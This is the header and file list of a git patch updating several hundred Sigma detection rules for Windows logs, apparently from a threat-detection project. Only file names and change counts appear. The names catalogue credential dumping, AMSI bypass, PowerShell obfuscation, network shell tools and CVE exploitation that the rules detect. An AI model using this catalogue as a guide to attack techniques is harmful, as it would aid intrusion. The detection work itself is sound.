From 3e19428c8384a270964121821e64612aa0c3884c Mon Sep 17 00:00:00 2001 
From: YamatoSecurity Date: Sat, 20 Jan 2024 01:48:34 +0000 Subject: [PATCH] Sigma Rule Update (2024-01-20 01:48:33) --- .../Other/win_av_relevant_match.yml | 12 +- .../win_application_msmpeng_crash_error.yml | 8 +- ...in_werfault_susp_lsass_credential_dump.yml | 6 +- .../esent/win_esent_ntdsutil_abuse.yml | 1 + ...win_esent_ntdsutil_abuse_susp_location.yml | 7 +- .../win_audit_cve.yml | 13 +- ...in_software_restriction_policies_block.yml | 13 +- .../win_builtin_remove_application.yml | 1 + .../win_msi_install_from_susp_locations.yml | 8 +- .../msiinstaller/win_msi_install_from_web.yml | 1 + .../win_software_atera_rmm_agent_install.yml | 3 +- .../win_mssql_add_sysadmin_account.yml | 7 +- .../win_mssql_disable_audit_settings.yml | 10 +- .../mssqlserver/win_mssql_failed_logon.yml | 8 +- ...sql_failed_logon_from_external_network.yml | 17 +- .../win_mssql_sp_procoption_set.yml | 8 +- .../win_mssql_xp_cmdshell_audit_log.yml | 8 +- .../win_mssql_xp_cmdshell_change.yml | 4 +- ...ccess_tools_screenconnect_command_exec.yml | 4 +- ...cess_tools_screenconnect_file_transfer.yml | 4 +- .../win_application_msmpeng_crash_wer.yml | 4 +- ..._applocker_file_was_not_allowed_to_run.yml | 4 +- ...time_sysinternals_tools_appx_execution.yml | 4 +- ...n_appxdeployment_server_mal_appx_names.yml | 8 +- ...win_appxdeployment_server_policy_block.yml | 3 +- ..._server_susp_appx_package_installation.yml | 6 +- ...win_appxdeployment_server_susp_domains.yml | 5 +- ...ployment_server_susp_package_locations.yml | 4 +- ...ment_server_uncommon_package_locations.yml | 8 +- ...n_appxpackaging_om_sups_appx_signature.yml | 8 +- .../win_bits_client_new_job_via_bitsadmin.yml | 3 +- ...nt_new_transfer_saving_susp_extensions.yml | 10 +- ..._new_transfer_via_file_sharing_domains.yml | 2 +- ...its_client_new_transfer_via_ip_address.yml | 15 +- ...s_client_new_transfer_via_uncommon_tld.yml | 10 +- ..._client_new_trasnfer_susp_local_folder.yml | 4 +- ..._capi2_acquire_certificate_private_key.yml | 5 +- 
.../category/antivirus/av_exploiting.yml | 5 +- .../category/antivirus/av_hacktool.yml | 94 +- .../category/antivirus/av_password_dumper.yml | 38 +- .../category/antivirus/av_ransomware.yml | 2 +- .../category/antivirus/av_relevant_files.yml | 7 +- .../category/antivirus/av_webshell.yml | 115 +- ...sclient_lifecycle_system_cert_exported.yml | 8 +- .../win_codeintegrity_attempted_dll_load.yml | 34 +- ...tegrity_blocked_protected_process_file.yml | 5 +- ...in_codeintegrity_enforced_policy_block.yml | 5 +- ...n_codeintegrity_revoked_driver_blocked.yml | 2 +- ...in_codeintegrity_revoked_driver_loaded.yml | 4 +- ...in_codeintegrity_revoked_image_blocked.yml | 2 +- ...win_codeintegrity_revoked_image_loaded.yml | 4 +- ...n_codeintegrity_unsigned_driver_loaded.yml | 2 +- ...in_codeintegrity_unsigned_image_loaded.yml | 2 +- .../win_codeintegrity_whql_failure.yml | 4 +- sigma/builtin/deprecated/posh_pm_powercat.yml | 3 +- .../posh_ps_access_to_chrome_login_data.yml | 14 +- .../posh_ps_azurehound_commands.yml | 3 +- .../posh_ps_cl_mutexverifiers_lolscript.yml | 3 +- .../posh_ps_file_and_directory_discovery.yml | 14 +- .../builtin/deprecated/posh_ps_susp_gwmi.yml | 3 +- ...ershell_suspicious_invocation_specific.yml | 3 +- ...owershell_syncappvpublishingserver_exe.yml | 9 +- ...proc_creation_win_apt_apt29_thinktanks.yml | 5 +- .../proc_creation_win_apt_dragonfly.yml | 2 +- .../proc_creation_win_apt_gallium.yml | 9 +- .../proc_creation_win_apt_hurricane_panda.yml | 10 +- ...reation_win_apt_lazarus_activity_apr21.yml | 11 +- .../proc_creation_win_apt_lazarus_loader.yml | 14 +- ..._creation_win_apt_muddywater_dnstunnel.yml | 4 +- .../proc_creation_win_apt_ta505_dropper.yml | 7 +- ...c_creation_win_certutil_susp_execution.yml | 12 +- .../proc_creation_win_cmd_read_contents.yml | 20 +- ...oc_creation_win_cmd_redirect_to_stream.yml | 9 +- ...tial_acquisition_registry_hive_dumping.yml | 8 +- .../proc_creation_win_cscript_vbs.yml | 14 +- ...ion_mssql_xp_cmdshell_stored_procedure.yml | 
16 +- .../proc_creation_win_indirect_cmd.yml | 6 +- ...in_indirect_command_execution_forfiles.yml | 14 +- ...tion_win_invoke_obfuscation_via_rundll.yml | 4 +- ...in_invoke_obfuscation_via_use_rundll32.yml | 4 +- ...eation_win_lolbas_execution_of_wuauclt.yml | 7 +- .../proc_creation_win_lolbin_findstr.yml | 20 +- .../proc_creation_win_lolbin_office.yml | 7 +- .../proc_creation_win_lolbin_rdrleakdiag.yml | 6 +- ...ion_win_lolbins_by_office_applications.yml | 9 +- .../deprecated/proc_creation_win_mal_ryuk.yml | 10 +- ...on_win_malware_trickbot_recon_activity.yml | 12 +- .../proc_creation_win_mavinject_proc_inj.yml | 2 +- .../proc_creation_win_msdt_diagcab.yml | 9 +- ...proc_creation_win_new_service_creation.yml | 6 +- ...tion_win_nslookup_pwsh_download_cradle.yml | 9 +- .../proc_creation_win_odbcconf_susp_exec.yml | 10 +- ..._from_proxy_executing_regsvr32_payload.yml | 23 +- ...from_proxy_executing_regsvr32_payload2.yml | 23 +- ...on_win_office_spawning_wmi_commandline.yml | 8 +- ...creation_win_possible_applocker_bypass.yml | 16 +- ...n_powershell_amsi_bypass_pattern_nov22.yml | 7 +- ..._powershell_base64_invoke_susp_cmdlets.yml | 12 +- ...n_powershell_base64_listing_shadowcopy.yml | 3 +- ...eation_win_powershell_base64_shellcode.yml | 2 +- .../proc_creation_win_powershell_bitsjob.yml | 4 +- ...on_win_powershell_service_modification.yml | 15 +- ...ion_win_powershell_xor_encoded_command.yml | 22 +- .../proc_creation_win_reg_dump_sam.yml | 12 +- .../proc_creation_win_regsvr32_anomalies.yml | 44 +- .../proc_creation_win_renamed_paexec.yml | 27 +- ...reation_win_root_certificate_installed.yml | 18 +- .../proc_creation_win_run_from_zip.yml | 5 +- ...roc_creation_win_sc_delete_av_services.yml | 25 +- .../proc_creation_win_schtasks_user_temp.yml | 6 +- .../proc_creation_win_service_stop.yml | 33 +- .../proc_creation_win_susp_bitstransfer.yml | 7 +- ...eation_win_susp_cmd_exectution_via_wmi.yml | 9 +- ...oc_creation_win_susp_commandline_chars.yml | 27 +- 
...c_creation_win_susp_lolbin_non_c_drive.yml | 17 +- .../proc_creation_win_susp_run_folder.yml | 24 +- ...proc_creation_win_susp_squirrel_lolbin.yml | 14 +- ..._sysinternals_psexec_service_execution.yml | 8 +- ...eation_win_sysinternals_psexesvc_start.yml | 2 +- .../proc_creation_win_whoami_as_system.yml | 9 +- .../proc_creation_win_winword_dll_load.yml | 4 +- ..._win_wmic_execution_via_office_process.yml | 15 +- .../proc_creation_win_wmic_remote_command.yml | 6 +- .../proc_creation_win_wmic_remote_service.yml | 24 +- .../proc_creation_win_wuauclt_execution.yml | 8 +- ..._creation_syncappvpublishingserver_exe.yml | 7 +- ...add_sysinternals_sdelete_registry_keys.yml | 5 +- ...istry_event_asep_reg_keys_modification.yml | 23 +- ...sing_windows_telemetry_for_persistence.yml | 14 +- .../registry_set_add_hidden_user.yml | 3 +- ...ble_microsoft_office_security_features.yml | 5 + .../registry_set_office_security.yml | 3 +- .../registry_set_silentprocessexit.yml | 3 +- .../deprecated/sysmon_rclone_execution.yml | 9 +- .../deprecated/win_defender_disabled.yml | 10 +- .../win_dsquery_domain_trust_discovery.yml | 12 +- .../win_lateral_movement_condrv.yml | 7 +- ...in_security_group_modification_logging.yml | 53 +- ...in_security_lolbas_execution_of_nltest.yml | 9 +- .../deprecated/win_susp_esentutl_activity.yml | 6 +- .../win_susp_vssadmin_ntds_activity.yml | 5 +- ..._service_install_susp_double_ampersand.yml | 3 +- ...diagnosis_scripted_load_remote_diagcab.yml | 5 +- .../win_dns_client__mal_cobaltstrike.yml | 10 +- .../win_dns_client_anonymfiles_com.yml | 10 +- .../dns_client/win_dns_client_mega_nz.yml | 7 +- .../dns_client/win_dns_client_tor_onion.yml | 7 +- .../dns_client/win_dns_client_ufile_io.yml | 13 +- ...in_dns_server_failed_dns_zone_transfer.yml | 2 +- ...ns_server_susp_server_level_plugin_dll.yml | 11 +- .../win_usb_device_plugged.yml | 9 +- .../Axiom/proc_creation_win_apt_zxshell.yml | 4 +- ...eation_win_apt_turla_commands_critical.yml | 2 +- 
...oc_creation_win_apt_turla_comrat_may20.yml | 4 +- ...roc_creation_win_exploit_cve_2015_1641.yml | 5 +- ...roc_creation_win_exploit_cve_2017_0261.yml | 8 +- ...oc_creation_win_exploit_cve_2017_11882.yml | 3 +- ...roc_creation_win_exploit_cve_2017_8759.yml | 5 +- .../proc_creation_win_malware_adwind.yml | 16 +- .../proc_creation_win_malware_fireball.yml | 2 +- .../proc_creation_win_malware_notpetya.yml | 12 +- ...n_win_malware_plugx_susp_exe_locations.yml | 60 +- .../StoneDrill/win_system_apt_stonedrill.yml | 3 +- .../proc_creation_win_malware_wannacry.yml | 64 +- ...oc_creation_win_apt_apt10_cloud_hopper.yml | 9 +- .../proc_creation_win_apt_ta17_293a_ps.yml | 5 +- ...on_win_apt_lazarus_binary_masquerading.yml | 7 +- .../win_system_apt_carbonpaper_turla.yml | 3 +- .../win_system_apt_turla_service_png.yml | 3 +- .../proc_creation_win_malware_elise.yml | 8 +- ..._creation_win_apt_apt27_emissary_panda.yml | 9 +- .../TA/APT28/proc_creation_win_apt_sofacy.yml | 16 +- ...apt_apt29_phishing_campaign_indicators.yml | 15 +- ...c_creation_win_apt_muddywater_activity.yml | 6 +- .../proc_creation_win_apt_oilrig_mar18.yml | 27 +- .../OilRig/win_security_apt_oilrig_mar18.yml | 18 +- .../TA/OilRig/win_system_apt_oilrig_mar18.yml | 18 +- .../proc_creation_win_apt_slingshot.yml | 9 +- .../Slingshot/win_security_apt_slingshot.yml | 7 +- .../proc_creation_win_apt_tropictrooper.yml | 5 +- ...roc_creation_win_exploit_other_bearlpe.yml | 9 +- ...roc_creation_win_exploit_cve_2019_1388.yml | 9 +- .../proc_creation_win_malware_babyshark.yml | 15 +- .../proc_creation_win_malware_dridex.yml | 25 +- .../proc_creation_win_malware_dtrack.yml | 6 +- .../proc_creation_win_malware_emotet.yml | 25 +- .../proc_creation_win_malware_formbook.yml | 40 +- ...tion_win_malware_lockergoga_ransomware.yml | 2 +- .../QBot/proc_creation_win_malware_qbot.yml | 9 +- .../Ryuk/proc_creation_win_malware_ryuk.yml | 21 +- ...creation_win_malware_snatch_ransomware.yml | 10 +- 
...c_creation_win_apt_aptc12_bluemushroom.yml | 8 +- ...creation_win_apt_apt31_judgement_panda.yml | 9 +- ...c_creation_win_apt_bear_activity_gtr19.yml | 7 +- .../proc_creation_win_apt_empiremonkey.yml | 4 +- ...ation_win_apt_equationgroup_dll_u_load.yml | 11 +- .../proc_creation_win_apt_mustangpanda.yml | 22 +- .../proc_creation_win_apt_wocao.yml | 9 +- .../CVE-2020-0688/win_vul_cve_2020_0688.yml | 3 +- ...oc_creation_win_exploit_cve_2020_10189.yml | 5 +- ...roc_creation_win_exploit_cve_2020_1048.yml | 9 +- ...roc_creation_win_exploit_cve_2020_1350.yml | 5 +- ..._creation_win_malware_blue_mockingbird.yml | 12 +- ..._win_malware_emotet_rundll32_execution.yml | 12 +- ...creation_win_malware_ke3chang_tidepool.yml | 10 +- ...c_creation_win_malware_maze_ransomware.yml | 15 +- .../proc_creation_win_apt_evilnum_jul20.yml | 5 +- .../proc_creation_win_apt_gallium_iocs.yml | 83 +- .../GALLIUM/win_dns_analytic_apt_gallium.yml | 10 +- .../proc_creation_win_apt_greenbug_may20.yml | 13 +- ...reation_win_apt_lazarus_group_activity.yml | 22 +- .../proc_creation_win_apt_unc2452_cmds.yml | 22 +- .../proc_creation_win_apt_unc2452_ps.yml | 8 +- ...ation_win_apt_unc2452_vbscript_pattern.yml | 4 +- .../proc_creation_win_apt_taidoor.yml | 9 +- ...c_creation_win_apt_winnti_mal_hk_jan20.yml | 13 +- .../proc_creation_win_apt_winnti_pipemon.yml | 9 +- .../av_printernightmare_cve_2021_34527.yml | 8 +- ...win_exploit_cve_2021_1675_printspooler.yml | 6 +- ...cve_2021_1675_printspooler_operational.yml | 3 +- ...it_cve_2021_1675_printspooler_security.yml | 6 +- ...it_cve_2021_26084_atlassian_confluence.yml | 6 +- ..._win_exploit_cve_2021_26857_msexchange.yml | 6 +- ...ation_win_exploit_cve_2021_35211_servu.yml | 10 +- ...oc_creation_win_exploit_cve_2021_40444.yml | 7 +- ..._2021_40444_office_directory_traversal.yml | 6 +- ...oc_creation_win_exploit_cve_2021_41379.yml | 21 +- .../CVE-2021-41379/win_vul_cve_2021_41379.yml | 1 + .../win_system_exploit_cve_2021_42278.yml | 25 +- 
...samaccountname_spoofing_cve_2021_42287.yml | 5 +- ...n_win_exploit_other_razorinstaller_lpe.yml | 9 +- ...tion_win_exploit_other_systemnightmare.yml | 5 +- ...cve_2021_31979_cve_2021_33771_exploits.yml | 4 +- .../Exploits/win_exchange_cve_2021_42321.yml | 4 +- ...ation_win_malware_blackbyte_ransomware.yml | 9 +- .../Conti/proc_creation_win_malware_conti.yml | 2 +- .../proc_creation_win_malware_conti_7zip.yml | 2 +- ..._win_malware_conti_ransomware_commands.yml | 4 +- ...malware_conti_ransomware_database_dump.yml | 14 +- ...eation_win_malware_darkside_ransomware.yml | 4 +- ...win_malware_devil_bait_output_redirect.yml | 14 +- ...win_malware_goofy_guineapig_broken_cmd.yml | 5 +- ...g_googleupdate_uncommon_child_instance.yml | 13 +- ...creation_win_malware_pingback_backdoor.yml | 13 +- ...eation_win_malware_small_sieve_cli_arg.yml | 5 +- ...y_set_malware_small_sieve_evasion_typo.yml | 7 +- .../HAFNIUM/proc_creation_win_apt_hafnium.yml | 33 +- .../proc_creation_win_apt_revil_kaseya.yml | 9 +- .../proc_creation_win_apt_sourgrum.yml | 8 +- ...win_exploit_cve_2023_21554_queuejumper.yml | 2 +- ...eation_win_exploit_cve_2022_29072_7zip.yml | 20 +- ..._win_exploit_cve_2022_41120_sysmon_eop.yml | 13 +- ...re_bluesky_ransomware_files_indicators.yml | 11 +- ...on_win_malware_hermetic_wiper_activity.yml | 19 +- ...raspberry_robin_single_dot_ending_file.yml | 8 +- .../2022/Malware/win_mssql_sp_maggie.yml | 3 +- ..._creation_win_apt_actinium_persistence.yml | 5 +- .../MERCURY/proc_creation_win_apt_mercury.yml | 4 +- ...023_22518_confluence_tomcat_child_proc.yml | 24 +- ...ve_2023_23397_outlook_reminder_trigger.yml | 5 +- ...e_2023_23397_outlook_remote_file_query.yml | 12 +- ...oit_cve_2023_23397_outlook_remote_file.yml | 25 +- ..._windows_html_rce_share_access_pattern.yml | 6 +- ...ploit_cve_2023_38831_winrar_child_proc.yml | 30 +- ...on_exploit_cve_2023_40477_winrar_crash.yml | 4 +- .../Exploits/win_msmq_corrupted_packet.yml | 3 +- ...in_malware_coldsteel_anonymous_process.yml 
| 3 +- ..._malware_coldsteel_service_persistence.yml | 7 +- ...ry_set_malware_coldsteel_created_users.yml | 3 +- ..._malware_coldsteel_persistence_service.yml | 3 +- ..._autoit3_from_susp_parent_and_location.yml | 17 +- ...win_malware_darkgate_net_user_creation.yml | 8 +- ..._creation_win_malware_griffon_patterns.yml | 5 +- ...ware_icedid_rundll32_dllregisterserver.yml | 12 +- ...re_pikabot_combined_commands_execution.yml | 24 +- ...win_malware_pikabot_rundll32_discovery.yml | 17 +- ...win_malware_pikabot_rundll32_hollowing.yml | 15 +- ...n_malware_qakbot_regsvr32_calc_pattern.yml | 10 +- ..._win_malware_qakbot_rundll32_execution.yml | 11 +- ...on_win_malware_qakbot_rundll32_exports.yml | 16 +- ...are_qakbot_rundll32_fake_dll_execution.yml | 12 +- ...win_malware_qakbot_uninstaller_cleanup.yml | 17 +- ...alware_rhadamanthys_stealer_dll_launch.yml | 12 +- ..._malware_rorschach_ransomware_activity.yml | 4 +- ...n_win_malware_snake_installer_cli_args.yml | 9 +- ...ation_win_malware_snake_installer_exec.yml | 11 +- ...on_win_malware_snake_service_execution.yml | 8 +- ...y_event_malware_snake_covert_store_key.yml | 3 +- ...gistry_set_malware_snake_encrypted_key.yml | 11 +- ...stem_malware_snake_persistence_service.yml | 6 +- ...n_win_malware_3cx_compromise_execution.yml | 91 +- ...n_malware_3cx_compromise_susp_children.yml | 33 +- ...win_malware_3cx_compromise_susp_update.yml | 35 +- ...ity_apt_cozy_bear_scheduled_tasks_name.yml | 4 +- ..._cozy_bear_graphical_proton_task_names.yml | 14 +- ...ation_win_apt_diamond_sleet_indicators.yml | 5 +- ...event_apt_diamond_sleet_scheduled_task.yml | 6 +- ...urity_apt_diamond_sleet_scheduled_task.yml | 10 +- .../TA/FIN7/posh_ps_apt_fin7_powerhold.yml | 3 +- ...n_apt_fin7_powertrash_lateral_movement.yml | 7 +- ...posh_ps_apt_lace_tempest_eraser_script.yml | 6 +- ...h_ps_apt_lace_tempest_malware_launcher.yml | 6 +- ...pt_lace_tempest_cobalt_strike_download.yml | 5 +- ..._win_apt_lace_tempest_loader_execution.yml | 5 +- 
...storm_aspera_faspex_susp_child_process.yml | 115 +- ...int_sandstorm_log4j_wstomcat_execution.yml | 2 +- ...storm_manage_engine_susp_child_process.yml | 118 +- ...ation_win_apt_mustang_panda_indicators.yml | 7 +- ...int_management_exploitation_indicators.yml | 4 +- ...t_print_management_exploitation_pc_app.yml | 5 +- ...ion_win_apt_peach_sandstorm_indicators.yml | 2 +- .../firewall_as/win_firewall_as_add_rule.yml | 30 +- .../win_firewall_as_add_rule_susp_folder.yml | 14 +- .../win_firewall_as_change_rule.yml | 7 +- .../win_firewall_as_delete_all_rules.yml | 10 +- .../win_firewall_as_delete_rule.yml | 12 +- .../win_firewall_as_failed_load_gpo.yml | 5 +- .../win_firewall_as_reset_config.yml | 7 +- .../win_firewall_as_setting_change.yml | 14 +- .../win_lsa_server_normal_user_admin.yml | 26 +- .../win_exchange_proxylogon_oabvirtualdir.yml | 3 +- ...ange_proxyshell_certificate_generation.yml | 3 +- ...win_exchange_proxyshell_mailbox_export.yml | 6 +- ...hange_proxyshell_remove_mailbox_export.yml | 3 +- ...ge_set_oabvirtualdirectory_externalurl.yml | 3 +- .../win_exchange_transportagent.yml | 7 +- .../win_exchange_transportagent_failed.yml | 4 +- sigma/builtin/ntlm/win_susp_ntlm_auth.yml | 5 +- sigma/builtin/ntlm/win_susp_ntlm_rdp.yml | 3 +- ...shd_openssh_server_listening_on_socket.yml | 3 +- ...on_win_userdomain_variable_enumeration.yml | 2 +- ...osh_pc_abuse_nslookup_with_dns_records.yml | 7 +- .../posh_pc_delete_volume_shadow_copies.yml | 3 +- .../posh_pc_downgrade_attack.yml | 3 +- .../posh_pc_exe_calling_ps.yml | 3 +- .../powershell_classic/posh_pc_powercat.yml | 7 +- .../posh_pc_remote_powershell_session.yml | 5 +- .../posh_pc_remotefxvgpudisablement_abuse.yml | 20 +- .../posh_pc_renamed_powershell.yml | 2 + .../posh_pc_susp_download.yml | 4 +- .../posh_pc_susp_get_nettcpconnection.yml | 4 +- .../posh_pc_susp_zip_compress.yml | 26 +- ...posh_pc_tamper_windows_defender_set_mp.yml | 13 +- ...sh_pc_wsman_com_provider_no_powershell.yml | 4 +- 
.../posh_pc_xor_commandline.yml | 3 +- ..._pm_active_directory_module_dll_import.yml | 11 +- .../posh_pm_alternate_powershell_hosts.yml | 13 +- .../posh_pm_bad_opsec_artifacts.yml | 18 +- .../posh_pm_clear_powershell_history.yml | 6 +- .../posh_pm_decompress_commands.yml | 7 +- .../posh_pm_exploit_scripts.yml | 17 +- .../posh_pm_get_addbaccount.yml | 4 +- .../posh_pm_get_clipboard.yml | 3 +- .../posh_pm_invoke_obfuscation_clip.yml | 6 +- ...h_pm_invoke_obfuscation_obfuscated_iex.yml | 22 +- .../posh_pm_invoke_obfuscation_stdin.yml | 6 +- .../posh_pm_invoke_obfuscation_var.yml | 6 +- ...osh_pm_invoke_obfuscation_via_compress.yml | 6 +- .../posh_pm_invoke_obfuscation_via_rundll.yml | 6 +- .../posh_pm_invoke_obfuscation_via_stdin.yml | 6 +- ...osh_pm_invoke_obfuscation_via_use_clip.yml | 6 +- ...sh_pm_invoke_obfuscation_via_use_mhsta.yml | 6 +- ...pm_invoke_obfuscation_via_use_rundll32.yml | 4 +- .../posh_pm_invoke_obfuscation_via_var.yml | 8 +- .../posh_pm_malicious_commandlets.yml | 39 +- .../posh_pm_remote_powershell_session.yml | 4 +- .../posh_pm_remotefxvgpudisablement_abuse.yml | 20 +- .../posh_pm_susp_ad_group_reco.yml | 37 +- .../posh_pm_susp_download.yml | 4 +- .../posh_pm_susp_get_nettcpconnection.yml | 4 +- .../posh_pm_susp_invocation_generic.yml | 8 +- .../posh_pm_susp_invocation_specific.yml | 12 +- .../posh_pm_susp_local_group_reco.yml | 37 +- ..._pm_susp_reset_computermachinepassword.yml | 8 +- .../posh_pm_susp_smb_share_reco.yml | 16 +- .../posh_pm_susp_zip_compress.yml | 26 +- .../posh_pm_syncappvpublishingserver_exe.yml | 13 +- ...posh_ps_aadinternals_cmdlets_execution.yml | 9 +- .../posh_ps_access_to_browser_login_data.yml | 22 +- ..._ps_active_directory_module_dll_import.yml | 11 +- .../posh_ps_add_dnsclient_rule.yml | 10 +- .../posh_ps_add_windows_capability.yml | 12 +- .../posh_ps_adrecon_execution.yml | 5 +- .../posh_ps_amsi_bypass_pattern_nov22.yml | 3 +- .../posh_ps_amsi_null_bits_bypass.yml | 7 +- .../posh_ps_apt_silence_eda.yml | 2 + 
.../posh_ps_as_rep_roasting.yml | 4 +- .../posh_ps_audio_exfiltration.yml | 2 + .../posh_ps_automated_collection.yml | 3 +- .../posh_ps_capture_screenshots.yml | 10 +- .../posh_ps_clear_powershell_history.yml | 6 +- ...sh_ps_clearing_windows_console_history.yml | 4 +- .../posh_ps_cmdlet_scheduled_task.yml | 3 +- ...h_ps_computer_discovery_get_adcomputer.yml | 10 +- .../posh_ps_copy_item_system_directory.yml | 3 +- .../posh_ps_cor_profiler.yml | 17 +- .../posh_ps_create_volume_shadow_copy.yml | 3 +- .../posh_ps_detect_vm_env.yml | 10 +- .../posh_ps_directorysearcher.yml | 3 +- ...ps_directoryservices_accountmanagement.yml | 11 +- ..._ps_disable_psreadline_command_history.yml | 3 +- ...sh_ps_disable_windows_optional_feature.yml | 12 +- .../posh_ps_dnscat_execution.yml | 2 +- .../posh_ps_dotnet_assembly_from_file.yml | 3 +- .../posh_ps_download_com_cradles.yml | 7 +- ...mp_password_windows_credential_manager.yml | 10 +- .../posh_ps_enable_psremoting.yml | 4 +- ...s_enable_susp_windows_optional_feature.yml | 15 +- ...te_password_windows_credential_manager.yml | 10 +- .../posh_ps_etw_trace_evasion.yml | 8 +- ..._exchange_mailbox_smpt_forwarding_rule.yml | 3 +- .../posh_ps_export_certificate.yml | 11 +- .../posh_ps_frombase64string_archive.yml | 8 +- .../posh_ps_get_acl_service.yml | 12 +- .../posh_ps_get_adcomputer.yml | 3 +- .../powershell_script/posh_ps_get_adgroup.yml | 3 +- .../posh_ps_get_adreplaccount.yml | 10 +- .../posh_ps_get_childitem_bookmarks.yml | 14 +- ...et_process_security_software_discovery.yml | 20 +- .../powershell_script/posh_ps_hktl_rubeus.yml | 7 +- .../powershell_script/posh_ps_hktl_winpwn.yml | 13 +- .../powershell_script/posh_ps_hotfix_enum.yml | 3 +- .../posh_ps_icmp_exfiltration.yml | 4 +- .../posh_ps_import_module_susp_dirs.yml | 5 +- ...posh_ps_install_unsigned_appx_packages.yml | 7 +- .../posh_ps_invoke_command_remote.yml | 4 +- .../posh_ps_invoke_dnsexfiltration.yml | 17 +- .../posh_ps_invoke_obfuscation_clip.yml | 2 +- 
...h_ps_invoke_obfuscation_obfuscated_iex.yml | 15 +- .../posh_ps_invoke_obfuscation_stdin.yml | 2 +- .../posh_ps_invoke_obfuscation_var.yml | 2 +- ...osh_ps_invoke_obfuscation_via_compress.yml | 2 +- .../posh_ps_invoke_obfuscation_via_rundll.yml | 2 +- .../posh_ps_invoke_obfuscation_via_stdin.yml | 2 +- ...osh_ps_invoke_obfuscation_via_use_clip.yml | 2 +- ...sh_ps_invoke_obfuscation_via_use_mhsta.yml | 2 +- .../posh_ps_invoke_obfuscation_via_var.yml | 4 +- .../powershell_script/posh_ps_keylogging.yml | 5 +- .../powershell_script/posh_ps_localuser.yml | 9 +- .../posh_ps_mailboxexport_share.yml | 7 +- .../posh_ps_malicious_commandlets.yml | 56 +- .../posh_ps_malicious_keywords.yml | 4 +- ...ps_memorydump_getstoragediagnosticinfo.yml | 3 +- .../posh_ps_modify_group_policy_settings.yml | 7 +- .../powershell_script/posh_ps_msxml_com.yml | 13 +- .../posh_ps_nishang_malicious_commandlets.yml | 18 +- .../posh_ps_ntfs_ads_access.yml | 3 +- .../posh_ps_office_comobject_registerxll.yml | 7 +- .../posh_ps_potential_invoke_mimikatz.yml | 3 +- ...osh_ps_powerview_malicious_commandlets.yml | 60 +- .../posh_ps_psasyncshell.yml | 3 +- .../posh_ps_remote_session_creation.yml | 9 +- .../posh_ps_remotefxvgpudisablement_abuse.yml | 17 +- .../posh_ps_request_kerberos_ticket.yml | 8 +- .../posh_ps_resolve_list_of_ip_from_file.yml | 6 +- .../posh_ps_root_certificate_installed.yml | 6 +- .../posh_ps_run_from_mount_diskimage.yml | 3 +- ...osh_ps_script_with_upload_capabilities.yml | 3 +- .../posh_ps_send_mailmessage.yml | 10 +- .../posh_ps_sensitive_file_discovery.yml | 4 +- .../powershell_script/posh_ps_set_acl.yml | 12 +- .../posh_ps_set_acl_susp_location.yml | 14 +- ...posh_ps_set_policies_to_unsecure_level.yml | 15 +- ...sh_ps_shellintel_malicious_commandlets.yml | 1 + .../posh_ps_software_discovery.yml | 7 +- .../posh_ps_susp_ace_tampering.yml | 4 +- .../posh_ps_susp_ad_group_reco.yml | 13 +- .../posh_ps_susp_alias_obfscuation.yml | 12 +- .../posh_ps_susp_clear_eventlog.yml | 11 +- 
.../posh_ps_susp_directory_enum.yml | 3 +- .../posh_ps_susp_download.yml | 4 +- .../posh_ps_susp_execute_batch_script.yml | 22 +- .../posh_ps_susp_extracting.yml | 14 +- .../posh_ps_susp_follina_execution.yml | 3 +- ...susp_get_addefaultdomainpasswordpolicy.yml | 3 +- .../posh_ps_susp_getprocess_lsass.yml | 6 +- .../posh_ps_susp_hyper_v_condlet.yml | 3 +- .../posh_ps_susp_invocation_generic.yml | 8 +- .../posh_ps_susp_invocation_specific.yml | 12 +- ...sh_ps_susp_invoke_webrequest_useragent.yml | 11 +- .../posh_ps_susp_iofilestream.yml | 3 +- .../posh_ps_susp_keylogger_activity.yml | 3 +- .../posh_ps_susp_keywords.yml | 6 +- .../posh_ps_susp_local_group_reco.yml | 13 +- .../posh_ps_susp_mail_acces.yml | 10 +- .../posh_ps_susp_mount_diskimage.yml | 3 +- .../posh_ps_susp_mounted_share_deletion.yml | 4 +- .../posh_ps_susp_networkcredential.yml | 10 +- .../posh_ps_susp_new_psdrive.yml | 3 +- .../posh_ps_susp_proxy_scripts.yml | 3 +- .../posh_ps_susp_recon_export.yml | 3 +- .../posh_ps_susp_remove_adgroupmember.yml | 10 +- ..._service_dacl_modification_set_service.yml | 8 +- .../posh_ps_susp_set_alias.yml | 7 +- .../posh_ps_susp_smb_share_reco.yml | 14 +- .../posh_ps_susp_ssl_keyword.yml | 4 +- .../posh_ps_susp_unblock_file.yml | 3 +- .../posh_ps_susp_wallpaper.yml | 10 +- .../posh_ps_susp_win32_pnpentity.yml | 3 +- .../posh_ps_susp_win32_shadowcopy.yml | 3 +- ...posh_ps_susp_win32_shadowcopy_deletion.yml | 12 +- .../posh_ps_susp_windowstyle.yml | 10 +- .../posh_ps_susp_write_eventlog.yml | 7 +- .../posh_ps_susp_zip_compress.yml | 26 +- .../posh_ps_syncappvpublishingserver_exe.yml | 13 +- ...posh_ps_tamper_windows_defender_rem_mp.yml | 7 +- ...posh_ps_tamper_windows_defender_set_mp.yml | 13 +- .../posh_ps_test_netconnection.yml | 10 +- .../powershell_script/posh_ps_timestomp.yml | 10 +- .../posh_ps_token_obfuscation.yml | 20 +- .../posh_ps_user_discovery_get_aduser.yml | 10 +- .../posh_ps_user_profile_tampering.yml | 9 +- ..._ps_using_set_service_to_hide_services.yml | 
8 +- ...osh_ps_veeam_credential_dumping_script.yml | 3 +- .../posh_ps_web_request_cmd_and_cmdlets.yml | 8 +- .../posh_ps_win32_nteventlogfile_usage.yml | 3 +- .../posh_ps_win32_product_install_msi.yml | 3 +- .../posh_ps_win_api_susp_access.yml | 5 +- .../posh_ps_win_defender_exclusions_added.yml | 7 +- ...h_ps_windows_firewall_profile_disabled.yml | 7 +- .../posh_ps_winlogon_helper_dll.yml | 15 +- .../posh_ps_wmi_persistence.yml | 24 +- .../posh_ps_wmi_unquoted_service_search.yml | 7 +- .../powershell_script/posh_ps_wmimplant.yml | 3 + .../posh_ps_x509enrollment.yml | 4 +- .../powershell_script/posh_ps_xml_iex.yml | 13 +- ...proc_creation_win_7zip_exfil_dmp_files.yml | 28 +- ...creation_win_7zip_password_compression.yml | 23 +- ..._creation_win_7zip_password_extraction.yml | 24 +- ...ation_win_addinutil_suspicious_cmdline.yml | 24 +- ...n_win_addinutil_uncommon_child_process.yml | 9 +- ...reation_win_addinutil_uncommon_cmdline.yml | 16 +- ...eation_win_addinutil_uncommon_dir_exec.yml | 9 +- .../proc_creation_win_adplus_memory_dump.yml | 13 +- 